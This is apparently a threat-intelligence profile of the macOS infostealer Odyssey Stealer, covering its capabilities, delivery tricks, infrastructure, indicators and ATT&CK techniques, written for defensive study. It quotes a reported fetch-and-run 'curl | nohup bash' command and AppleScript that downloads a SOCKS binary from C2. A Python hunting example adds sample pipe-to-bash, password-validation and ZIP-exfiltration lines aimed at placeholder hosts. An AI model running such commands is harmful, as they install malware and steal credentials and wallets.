Odyssey Stealer
Odyssey Stealer is a macOS-focused information stealer and remote access trojan operated as a Malware-as-a-Service platform with an affiliate-based model. Multiple cited sources describe it as a rebrand of, and successor to, Poseidon Stealer, which was itself derived from Atomic macOS Stealer (AMOS). It has been observed targeting macOS users worldwide, with reporting noting activity across North America, Latin America, Europe, Asia, and Africa.
Its theft capabilities include credentials, cookies, and browser data from Chrome, Firefox, Safari, Chromium-based browsers, and Gecko-based browsers; macOS Keychain data; Apple Notes; Telegram Desktop data; personal files; and cryptocurrency wallet data. Reporting states it targets more than 100 browser wallet extensions (203 browser wallet extensions in one analysis), as well as numerous desktop wallet applications including MetaMask, Phantom, Electrum, Ledger Live, Trezor Suite, Exodus, Atomic, Bitcoin Core, Monero, Wasabi, and Sparrow. Stolen data is compressed and exfiltrated, including in ZIP format.
Beyond infostealing, Odyssey functions as a full RAT. Reported capabilities include arbitrary shell execution, reinfection, SOCKS5 proxy enablement, uninstall support, and persistent command polling every 60 seconds via a LaunchDaemon. The malware can display a fake macOS password prompt, validate the password with dscl . authonly, use the stolen password to access Keychain-derived secrets, install persistence, and replace legitimate Ledger and Trezor applications with trojanized versions designed to intercept credentials and transactions.
Observed delivery vectors in the cited reporting include obfuscated AppleScript payloads, fake CAPTCHA and ClickFix-style social engineering, fake Homebrew installer pages, spoofed software portals, seemingly legitimate software updates, cracked tools, fraudulent apps, and campaigns abusing legitimate ChatGPT share links and Google ads. The reporting also notes use in broader ClickFix ecosystems and in campaigns targeting macOS developers.
Infrastructure reporting ties Odyssey to centrally hosted MaaS/C2 infrastructure and an affiliate panel. Censys-based tracking identified 10 physical hosts associated with its MaaS and C2 infrastructure. Reported indicators include domains such as something0x[.]at, charge0x[.]at, and sdojifsfiudgigfiv[.]to; IPs 62.60.131[.]230, 62.60.131[.]250, 5.199.166[.]102, 77.90.185[.]24, 185.11.61[.]84, 217.119.139[.]117, 185.93.89[.]62, 185.93.89[.]63, 45.146.130[.]129, and 213.209.159[.]175; and a shared SOCKS proxy binary SHA256 d254125912d9e9e5c271766bc4f6eea0c296ad2c0cf19d4bd57081d1bf10f044. Additional reported infrastructure and IOCs include 45.146.130.131, used for exfiltration and second-stage activity, and the command curl -s http://185[.]93[.]89[.]62/d/vipx69930 | nohup bash & observed in fake Homebrew delivery.
The reporting associates the Odyssey/Poseidon lineage with a developer known as Rodrigo4 on the Russian-language XSS forum and notes indicators consistent with Russian-speaking developers or operators, including Russian-language forum activity and dashboard translations. However, the available material supports this as ecosystem/operator context rather than a formal attribution to a named state actor.
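The behaviours this page reports (the fake password prompt validated with dscl . authonly, the curl | nohup bash ClickFix stage, the SOCKS binary fetched from /otherassets/socks, the ZIP POSTed to /log, and LaunchDaemon polling every 60 seconds) translate directly into hunting rules. The following is an added example, not code from the page or any vendor: it runs regex rules over constructed process-event lines (hosts and paths are placeholders) and flags a LaunchDaemon/LaunchAgent definition that polls a remote host on a short interval; the log format and the interval threshold are this example's own assumptions.

```python
import re
from typing import List, Tuple

# Constructed process-event lines, not real telemetry. Assumed format:
# "<parent> -> <child>: <command line>". Hosts are placeholders.
SAMPLE_EVENTS = [
    "Terminal -> bash: curl -s http://EXAMPLE-C2.invalid/d/placeholder | nohup bash &",
    "osascript -> dscl: dscl . authonly jdoe <redacted>",
    "osascript -> sh: curl -o /tmp/socks http://EXAMPLE-C2.invalid/otherassets/socks",
    "launchd -> sh: curl -X POST --data-binary @/tmp/out.zip http://EXAMPLE-C2.invalid/log",
    "Finder -> open: open /Applications/Safari.app",
    "brew -> curl: curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh",
]

# Each rule: (description, regex over the whole event line, ATT&CK tactic as on this page)
RULES: List[Tuple[str, re.Pattern, str]] = [
    ("curl output piped to nohup bash (ClickFix / fake Homebrew stage)",
     re.compile(r"curl\b.*\|\s*nohup\s+bash"), "Execution"),
    ("dscl . authonly spawned by osascript (fake password prompt validation)",
     re.compile(r"^osascript\s*->\s*dscl:\s*dscl\s+\.\s+authonly\b"), "Credential Access"),
    ("SOCKS binary downloaded to /tmp from /otherassets/ (enablesocks5)",
     re.compile(r"curl\b.*-o\s+/tmp/socks\b.*/otherassets/socks"), "Command and Control"),
    ("ZIP archive POSTed to a /log endpoint",
     re.compile(r"curl\b.*POST.*\.zip\b.*/log(\s|$)"), "Exfiltration"),
]


def scan_events(events: List[str]) -> List[Tuple[str, str, str]]:
    """Return (tactic, rule description, offending line) for every rule hit."""
    hits = []
    for line in events:
        for description, pattern, tactic in RULES:
            if pattern.search(line):
                hits.append((tactic, description, line))
    return hits


def suspicious_launchdaemon(plist: dict) -> bool:
    """Flag a launchd job (dict as returned by plistlib.load) that polls on a short
    interval through curl/nohup/osascript. The 60-second bound mirrors the polling
    interval reported for this family; it is an assumption of this example."""
    args = " ".join(plist.get("ProgramArguments", []))
    interval = plist.get("StartInterval")
    polls_fast = isinstance(interval, int) and interval <= 60
    return polls_fast and bool(re.search(r"\b(curl|nohup|osascript)\b", args))


if __name__ == "__main__":
    for tactic, description, line in scan_events(SAMPLE_EVENTS):
        print(f"[{tactic}] {description}\n    {line}")
```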
Groups observed using it
1 distinct threat actor attributed by public researchers.
Odyssey Stealer is a macOS information stealer designed to steal cryptocurrencies. It operates as a Malware-as-a-Service (MaaS) platform with an affiliate-based model... Beyond credential theft, Odyssey operates as a full remote access trojan.
Techniques & procedures
26 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Affiliates pay for panel access, run their own social engineering campaigns (phishing, malvertising, fake download sites)
Initial Access
3 techniques
"Odyssey Stealer ... has been deployed via seemingly legitimate software updates, cracked tools, and fraudulent apps"
When a user clicks one of these malicious search ads, they go to a legitimate URL that looks exactly like a normal chatgpt.com/s/[unique-id] share link.
Iru Threat Intelligence has seen a recent increase in attackers using spoofed Homebrew webpages to get users to download malware.
Execution
5 techniques
supporting arbitrary shell execution ... if command_type is equal to "doshell" then do shell script command_payload
Often delivered via obfuscated AppleScript payloads ... Stage 1: The Initial Dropper The main payload is obfuscated AppleScript wrapped in a shell script.
The main payload is obfuscated AppleScript wrapped in a shell script ... do shell script command_payload
A social engineering technique called ClickFix has resurfaced with significant force, tricking users on both Windows and macOS into manually executing malicious commands that quietly install malware on their devices.
This technique closely mirrors recent “ClickFix” social-engineering campaigns, where victims are coerced into pasting attacker-supplied shell commands... The result is a compact and effective initial infection vector.
Stealth
4 techniques
"Aside from continuously modifying its code structure to evade standard blocklists"
The attackers render a custom HTML layout directly on the legitimate domain to display a fake system maintenance message like "we're experiencing high traffic right now," to simulate a crash, and try to get you to download their desktop app.
All five clusters rely on a living-off-the-land (LotL) approach, using trusted system tools already present on the operating system to carry out the attack. By routing execution through native utilities like PowerShell or the macOS Terminal, attackers effectively operate outside the reach of most standard browser-based security defenses.
Credential Access
6 techniques
A fake dialog tricks the user into entering their macOS password ... The password is validated against the system using dscl . authonly
On macOS, this exact trap drops Odyssey Stealer to steal sensitive data.
Browser Data (Chromium-based): Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Arc, CocCoc Cookies ... Browser Data (Gecko-based): Firefox, Waterfox cookies.sqlite
The password is validated against the system using dscl . authonly and then used for: Extracting Chrome’s master password from Keychain ... Keychain – Full Keychain database (login.keychain-db)
"...to compromise browser-stored information and the macOS Keychain"
Discovery
1 technique
Collection
3 techniques
A fake dialog tricks the user into entering their macOS password ... The password is validated against the system using dscl . authonly
Rather than allowing users to highlight and copy the install command, the page forces them to use a single Copy button. That restriction is purposeful: it enables the attacker to inject an extra hidden command into the clipboard, outside of what is shown to the user on the webpage, which downloads a malicious payload in parallel with the Homebrew installer.
Collect data ... Exfiltrate ZIP: Data is zipped and sent to the C2 via POST to /log
Command and Control
3 techniques
supporting arbitrary shell execution, reinfection, and a SOCKS5 proxy for tunneling traffic through victim machines ... enablesocks5 Downloads and runs SOCKS5 proxy
do shell script "curl -o /tmp/socks " & c2_host & "/otherassets/socks" ... Trojanized asset distribution (/otherassets/)
Beyond credential theft, Odyssey operates as a full remote access trojan.
Exfiltration
1 technique
Exfiltrate ZIP: Data is zipped and sent to the C2 via POST to /log ... Data Exfiltration POST /log
Other
1 technique
IOCs tracked for this family
73 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
21 sources tracked across advisories, community write-ups, and news.
An infostealer delivered via fake ChatGPT desktop app download pages in the LLMShare campaign; it targets macOS users and steals sensitive data.
Information-stealing malware observed being downloaded by the spoofed Homebrew infrastructure as part of the campaign.
Information-stealing malware deployed via ClickFix campaigns, associated with credential theft and cryptocurrency wallet data harvesting.
A malware family referenced as a secondary payload delivered through ClickFix activity.